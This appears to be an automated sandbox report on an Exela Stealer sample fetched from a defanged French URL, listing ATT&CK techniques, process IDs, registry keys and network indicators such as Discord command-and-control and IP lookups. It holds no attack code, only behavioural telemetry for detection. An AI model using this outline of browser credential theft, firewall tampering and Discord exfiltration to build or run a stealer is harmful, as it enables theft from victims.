exelastealer | hxxp://scorpix[.]fr

Analysis

max time kernel
141s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2024 13:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://scorpix.fr

Score

10^/10

exelastealer collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
64	powershell.exe
4572	powershell.exe
1432	powershell.exe
5180	powershell.exe
1408	powershell.exe
5704	powershell.exe
2736	powershell.exe
1064	powershell.exe
2284	powershell.exe
4780	powershell.exe
3200	powershell.exe
3192	powershell.exe
1536	powershell.exe
3096	powershell.exe
5380	powershell.exe
1076	powershell.exe
3336	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ScorpixV2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ScorpixV2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ScorpixV2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
208	netsh.exe
5416	netsh.exe
1060	netsh.exe
2904	netsh.exe

Clipboard Data 1 TTPs 10 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1248	cmd.exe
4888	cmd.exe
4956	cmd.exe
3352	cmd.exe
5268	powershell.exe
5848	powershell.exe
3176	powershell.exe
5940	powershell.exe
3496	cmd.exe
5692	powershell.exe

Executes dropped EXE 21 IoCs

pid	Process
5036	ScorpixV2.exe
3496	ScorpixV2.exe
3028	ScorpixV2.exe
3616	ScorpixV2.exe
4376	bound.exe
2580	bound.exe
5212	ScorpixV2.exe
1440	ScorpixV2.exe
3880	rar.exe
2416	ScorpixV2.exe
5348	ScorpixV2.exe
1460	ScorpixV2.exe
5612	ScorpixV2.exe
4992	rar.exe
4692	ScorpixV2.exe
5092	ScorpixV2.exe
2780	bound.exe
920	bound.exe
5816	ScorpixV2.exe
2736	ScorpixV2.exe
5340	rar.exe

Loads dropped DLL 64 IoCs

pid	Process
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
3496	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3496	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
2580	bound.exe
2580	bound.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
3616	ScorpixV2.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
3616	ScorpixV2.exe
2580	bound.exe
3616	ScorpixV2.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
2580	bound.exe
1440	ScorpixV2.exe
1440	ScorpixV2.exe
1440	ScorpixV2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023554-256.dat	upx
behavioral1/memory/3496-260-0x00007FF8E67A0000-0x00007FF8E6C0E000-memory.dmp	upx
behavioral1/files/0x0007000000023546-263.dat	upx
behavioral1/memory/3496-266-0x00007FF8FCFC0000-0x00007FF8FCFE4000-memory.dmp	upx
behavioral1/files/0x0007000000023552-267.dat	upx
behavioral1/files/0x000700000002354d-284.dat	upx
behavioral1/files/0x000700000002354c-283.dat	upx
behavioral1/files/0x000700000002354b-282.dat	upx
behavioral1/files/0x000700000002354a-281.dat	upx
behavioral1/files/0x0007000000023549-280.dat	upx
behavioral1/files/0x0007000000023548-279.dat	upx
behavioral1/files/0x0007000000023547-278.dat	upx
behavioral1/files/0x0007000000023545-277.dat	upx
behavioral1/files/0x0007000000023559-276.dat	upx
behavioral1/files/0x0007000000023558-275.dat	upx
behavioral1/files/0x0007000000023557-274.dat	upx
behavioral1/files/0x0007000000023553-271.dat	upx
behavioral1/files/0x0007000000023551-270.dat	upx
behavioral1/memory/3496-297-0x00007FF8FEBC0000-0x00007FF8FEBCF000-memory.dmp	upx
behavioral1/memory/3616-313-0x00007FF8E6330000-0x00007FF8E679E000-memory.dmp	upx
behavioral1/memory/3496-336-0x00007FF8F95B0000-0x00007FF8F9719000-memory.dmp	upx
behavioral1/memory/3496-337-0x00007FF8F9590000-0x00007FF8F95A9000-memory.dmp	upx
behavioral1/memory/3496-335-0x00007FF8F9720000-0x00007FF8F973F000-memory.dmp	upx
behavioral1/memory/3496-340-0x00007FF8F9560000-0x00007FF8F958E000-memory.dmp	upx
behavioral1/memory/3496-346-0x00007FF8EA670000-0x00007FF8EA788000-memory.dmp	upx
behavioral1/memory/3496-345-0x00007FF8FA200000-0x00007FF8FA20D000-memory.dmp	upx
behavioral1/memory/3496-344-0x00007FF8F7330000-0x00007FF8F7344000-memory.dmp	upx
behavioral1/memory/3496-342-0x00007FF8E6FD0000-0x00007FF8E7347000-memory.dmp	upx
behavioral1/memory/3616-399-0x00007FF8E88F0000-0x00007FF8E8909000-memory.dmp	upx
behavioral1/memory/3616-397-0x00007FF8EA5E0000-0x00007FF8EA60D000-memory.dmp	upx
behavioral1/memory/3616-400-0x00007FF8E4030000-0x00007FF8E4199000-memory.dmp	upx
behavioral1/memory/3616-398-0x00007FF8E88D0000-0x00007FF8E88EF000-memory.dmp	upx
behavioral1/memory/3496-401-0x00007FF8E67A0000-0x00007FF8E6C0E000-memory.dmp	upx
behavioral1/memory/3616-404-0x00007FF8FA090000-0x00007FF8FA09D000-memory.dmp	upx
behavioral1/memory/3616-403-0x00007FF8E8890000-0x00007FF8E88A9000-memory.dmp	upx
behavioral1/memory/3616-405-0x00007FF8E3500000-0x00007FF8E3877000-memory.dmp	upx
behavioral1/memory/3496-408-0x00007FF8FCFC0000-0x00007FF8FCFE4000-memory.dmp	upx
behavioral1/memory/3616-407-0x00007FF8E84B0000-0x00007FF8E84DE000-memory.dmp	upx
behavioral1/memory/3616-406-0x00007FF8E3C70000-0x00007FF8E3D27000-memory.dmp	upx
behavioral1/memory/2580-402-0x00007FF8E2480000-0x00007FF8E28EE000-memory.dmp	upx
behavioral1/memory/3496-341-0x00007FF8EA920000-0x00007FF8EA9D7000-memory.dmp	upx
behavioral1/memory/3496-339-0x00007FF8FD0A0000-0x00007FF8FD0AD000-memory.dmp	upx
behavioral1/memory/3496-334-0x00007FF8F9980000-0x00007FF8F9999000-memory.dmp	upx
behavioral1/memory/3616-446-0x00007FF8EA5E0000-0x00007FF8EA60D000-memory.dmp	upx
behavioral1/memory/3616-453-0x00007FF8E6330000-0x00007FF8E679E000-memory.dmp	upx
behavioral1/memory/2580-470-0x00007FF8E2FF0000-0x00007FF8E30A7000-memory.dmp	upx
behavioral1/memory/2580-469-0x00007FF8DE510000-0x00007FF8DE887000-memory.dmp	upx
behavioral1/memory/2580-468-0x00007FF8E3AA0000-0x00007FF8E3ACE000-memory.dmp	upx
behavioral1/memory/3496-467-0x00007FF8F9590000-0x00007FF8F95A9000-memory.dmp	upx
behavioral1/memory/2580-452-0x00007FF8E2310000-0x00007FF8E2479000-memory.dmp	upx
behavioral1/memory/3496-451-0x00007FF8F95B0000-0x00007FF8F9719000-memory.dmp	upx
behavioral1/memory/3496-450-0x00007FF8F9720000-0x00007FF8F973F000-memory.dmp	upx
behavioral1/memory/2580-449-0x00007FF8E39E0000-0x00007FF8E3A0D000-memory.dmp	upx
behavioral1/memory/2580-448-0x00007FF8E3A10000-0x00007FF8E3A29000-memory.dmp	upx
behavioral1/memory/2580-447-0x00007FF8F91B0000-0x00007FF8F91BD000-memory.dmp	upx
behavioral1/memory/3616-445-0x00007FF8FD1A0000-0x00007FF8FD1AF000-memory.dmp	upx
behavioral1/memory/3616-444-0x00007FF8E88F0000-0x00007FF8E8909000-memory.dmp	upx
behavioral1/memory/3616-443-0x00007FF8E84B0000-0x00007FF8E84DE000-memory.dmp	upx
behavioral1/memory/3616-441-0x00007FF8E8490000-0x00007FF8E84A4000-memory.dmp	upx
behavioral1/memory/3616-439-0x00007FF8E3500000-0x00007FF8E3877000-memory.dmp	upx
behavioral1/memory/3616-437-0x00007FF8FA090000-0x00007FF8FA09D000-memory.dmp	upx
behavioral1/memory/3616-436-0x00007FF8E8890000-0x00007FF8E88A9000-memory.dmp	upx
behavioral1/memory/3616-435-0x00007FF8E4030000-0x00007FF8E4199000-memory.dmp	upx
behavioral1/memory/3616-434-0x00007FF8E88D0000-0x00007FF8E88EF000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
141	discord.com
142	discord.com
105	discord.com
128	discord.com
129	discord.com
130	discord.com
131	discord.com
132	discord.com
151	discord.com
106	discord.com
152	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
89	ip-api.com
102	ip-api.com
139	ip-api.com
147	ip-api.com

Network Service Discovery 1 TTPs 4 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
5376	ARP.EXE
5640	cmd.exe
4068	ARP.EXE
5560	cmd.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 25 IoCs

discovery

Process Discovery

T1057

pid	Process
6016	tasklist.exe
5128	tasklist.exe
3096	tasklist.exe
5048	tasklist.exe
2596	tasklist.exe
1808	tasklist.exe
3804	tasklist.exe
1720	tasklist.exe
4960	tasklist.exe
3236	tasklist.exe
4020	tasklist.exe
4712	tasklist.exe
4720	tasklist.exe
2312	tasklist.exe
3560	tasklist.exe
1592	tasklist.exe
2624	tasklist.exe
3568	tasklist.exe
5272	tasklist.exe
2376	tasklist.exe
5540	tasklist.exe
4860	tasklist.exe
2604	tasklist.exe
5340	tasklist.exe
4604	tasklist.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4284	sc.exe
5896	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 21 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 10 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4408	cmd.exe
1316	cmd.exe
4024	cmd.exe
5704	netsh.exe
6096	netsh.exe
2744	cmd.exe
5900	netsh.exe
5236	netsh.exe
3748	cmd.exe
5540	netsh.exe

System Network Connections Discovery 1 TTPs 2 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2816	NETSTAT.EXE
1412	NETSTAT.EXE

Collects information from the system 1 TTPs 2 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
228	WMIC.exe
5884	WMIC.exe

Detects videocard installed 1 TTPs 11 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3464	WMIC.exe
4032	WMIC.exe
5216	WMIC.exe
5796	WMIC.exe
5652	WMIC.exe
5652	WMIC.exe
2404	WMIC.exe
1076	WMIC.exe
316	WMIC.exe
5156	WMIC.exe
3548	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2816	NETSTAT.EXE
652	ipconfig.exe
1412	NETSTAT.EXE
4340	ipconfig.exe

Gathers system information 1 TTPs 5 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1068	systeminfo.exe
5964	systeminfo.exe
5532	systeminfo.exe
5340	systeminfo.exe
5908	systeminfo.exe

Kills process with taskkill 39 IoCs

evasion

pid	Process
5860	taskkill.exe
4704	taskkill.exe
5692	taskkill.exe
5396	taskkill.exe
4776	taskkill.exe
5180	taskkill.exe
5708	taskkill.exe
6128	taskkill.exe
396	taskkill.exe
5756	taskkill.exe
5628	taskkill.exe
5432	taskkill.exe
912	taskkill.exe
208	taskkill.exe
4264	taskkill.exe
4980	taskkill.exe
5568	taskkill.exe
2104	taskkill.exe
6012	taskkill.exe
2112	taskkill.exe
5176	taskkill.exe
1316	taskkill.exe
3028	taskkill.exe
5296	taskkill.exe
5876	taskkill.exe
5236	taskkill.exe
5696	taskkill.exe
6108	taskkill.exe
6120	taskkill.exe
4356	taskkill.exe
3780	taskkill.exe
1364	taskkill.exe
6012	taskkill.exe
2700	taskkill.exe
4868	taskkill.exe
5488	taskkill.exe
2308	taskkill.exe
1076	taskkill.exe
5892	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133670780644669767"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3089151618-2647890268-2710988337-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 736629.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3644	msedge.exe
3644	msedge.exe
4688	msedge.exe
4688	msedge.exe
3216	identity_helper.exe
3216	identity_helper.exe
2052	msedge.exe
2052	msedge.exe
3200	powershell.exe
3200	powershell.exe
3192	powershell.exe
3192	powershell.exe
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
3200	powershell.exe
3192	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
5268	powershell.exe
5268	powershell.exe
5268	powershell.exe
5524	powershell.exe
5524	powershell.exe
5524	powershell.exe
5180	powershell.exe
5180	powershell.exe
5180	powershell.exe
2184	powershell.exe
2184	powershell.exe
2184	powershell.exe
5848	powershell.exe
5848	powershell.exe
5848	powershell.exe
1408	powershell.exe
1408	powershell.exe
1408	powershell.exe
4328	powershell.exe
4328	powershell.exe
5576	chrome.exe
5576	chrome.exe
2736	powershell.exe
2736	powershell.exe
3096	powershell.exe
3096	powershell.exe
2736	powershell.exe
3096	powershell.exe
5380	powershell.exe
5380	powershell.exe
5380	powershell.exe
3176	powershell.exe
3176	powershell.exe
3780	powershell.exe
3780	powershell.exe
3176	powershell.exe
3780	powershell.exe
1064	powershell.exe
1064	powershell.exe
5228	powershell.exe
5228	powershell.exe
5704	powershell.exe
5704	powershell.exe
1796	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeSecurityPrivilege	2240	WMIC.exe
Token: SeTakeOwnershipPrivilege	2240	WMIC.exe
Token: SeLoadDriverPrivilege	2240	WMIC.exe
Token: SeSystemProfilePrivilege	2240	WMIC.exe
Token: SeSystemtimePrivilege	2240	WMIC.exe
Token: SeProfSingleProcessPrivilege	2240	WMIC.exe
Token: SeIncBasePriorityPrivilege	2240	WMIC.exe
Token: SeCreatePagefilePrivilege	2240	WMIC.exe
Token: SeBackupPrivilege	2240	WMIC.exe
Token: SeRestorePrivilege	2240	WMIC.exe
Token: SeShutdownPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	2240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2240	WMIC.exe
Token: SeRemoteShutdownPrivilege	2240	WMIC.exe
Token: SeUndockPrivilege	2240	WMIC.exe
Token: SeManageVolumePrivilege	2240	WMIC.exe
Token: 33	2240	WMIC.exe
Token: 34	2240	WMIC.exe
Token: 35	2240	WMIC.exe
Token: 36	2240	WMIC.exe
Token: SeDebugPrivilege	4960	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeSecurityPrivilege	2240	WMIC.exe
Token: SeTakeOwnershipPrivilege	2240	WMIC.exe
Token: SeLoadDriverPrivilege	2240	WMIC.exe
Token: SeSystemProfilePrivilege	2240	WMIC.exe
Token: SeSystemtimePrivilege	2240	WMIC.exe
Token: SeProfSingleProcessPrivilege	2240	WMIC.exe
Token: SeIncBasePriorityPrivilege	2240	WMIC.exe
Token: SeCreatePagefilePrivilege	2240	WMIC.exe
Token: SeBackupPrivilege	2240	WMIC.exe
Token: SeRestorePrivilege	2240	WMIC.exe
Token: SeShutdownPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	2240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2240	WMIC.exe
Token: SeRemoteShutdownPrivilege	2240	WMIC.exe
Token: SeUndockPrivilege	2240	WMIC.exe
Token: SeManageVolumePrivilege	2240	WMIC.exe
Token: 33	2240	WMIC.exe
Token: 34	2240	WMIC.exe
Token: 35	2240	WMIC.exe
Token: 36	2240	WMIC.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeIncreaseQuotaPrivilege	4972	WMIC.exe
Token: SeSecurityPrivilege	4972	WMIC.exe
Token: SeTakeOwnershipPrivilege	4972	WMIC.exe
Token: SeLoadDriverPrivilege	4972	WMIC.exe
Token: SeSystemProfilePrivilege	4972	WMIC.exe
Token: SeSystemtimePrivilege	4972	WMIC.exe
Token: SeProfSingleProcessPrivilege	4972	WMIC.exe
Token: SeIncBasePriorityPrivilege	4972	WMIC.exe
Token: SeCreatePagefilePrivilege	4972	WMIC.exe
Token: SeBackupPrivilege	4972	WMIC.exe
Token: SeRestorePrivilege	4972	WMIC.exe
Token: SeShutdownPrivilege	4972	WMIC.exe
Token: SeDebugPrivilege	4972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4972	WMIC.exe
Token: SeRemoteShutdownPrivilege	4972	WMIC.exe
Token: SeUndockPrivilege	4972	WMIC.exe
Token: SeManageVolumePrivilege	4972	WMIC.exe
Token: 33	4972	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
4688	msedge.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe
5576	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4688 wrote to memory of 2500	4688	msedge.exe	83
PID 4688 wrote to memory of 2500	4688	msedge.exe	83
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 4160	4688	msedge.exe	85
PID 4688 wrote to memory of 3644	4688	msedge.exe	86
PID 4688 wrote to memory of 3644	4688	msedge.exe	86
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87
PID 4688 wrote to memory of 2616	4688	msedge.exe	87

